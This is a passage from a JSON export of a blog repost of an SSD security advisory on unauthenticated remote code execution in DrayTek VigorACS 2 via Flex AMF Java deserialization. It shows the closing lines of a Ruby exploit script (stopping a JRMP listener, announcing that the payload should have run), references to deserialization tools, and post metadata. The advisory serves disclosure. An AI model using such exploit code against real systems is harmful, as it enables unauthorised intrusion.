class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">green<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">bold<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-210\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">sleep<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">15<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-211\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-k\">Process<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">kill<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;HUP&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">jrmp_pid<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-212\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-213\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">t<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">terminate<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-214\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-215\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">puts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[*] Payload should have executed by now, exiting!&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">bold<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-216\"><span class=\"crayon-k\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-217\"><span class=\"crayon-st\">exit<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0178 seconds] -->  <\/p>\n<p>References:<br \/> [1] https:\/\/www.draytek.com\/en\/products\/central-management\/vigoracs-2\/<br \/> [2] https:\/\/www.draytek.com\/en\/faq\/faq-vigoracs-si\/vigoracs-2\/how-to-register-a-cpe-to-vigoracs-2-server\/<br \/> [3] https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-5641<br \/> [4] https:\/\/issues.apache.org\/jira\/browse\/FLEX-35290<br \/> [5] http:\/\/codewhitesec.blogspot.ru\/2017\/04\/amf.html<br \/> [6] https:\/\/github.com\/mbechler\/marshalsec<br \/> [7] https:\/\/github.com\/frohoff\/ysoserial<br \/> [8] https:\/\/github.com\/frohoff\/ysoserial\/issues\/71<\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3681\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Noam Rathaus| Date: Wed, 18 Apr 2018 05:24:56 +0000<\/strong><\/p>\n<p>Vulnerability Summary A vulnerability in Vigor ACS allows unauthenticated users to cause the product to execute arbitrary code. VigorACS 2 &#8220;is a powerful centralized management software for Vigor Routers and VigorAPs, it is an integrated solution for configuring, monitoring, and maintenance of multiple Vigor devices from a single portal. VigorACS 2 is based on TR-069 &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3681\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory &#8211; Vigor ACS Unsafe Flex AMF Java Object Deserialization<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11682,10757,12136],"class_list":["post-12066","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-remote-code-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/12066","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=12066"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/12066\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=12066"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=12066"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=12066"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}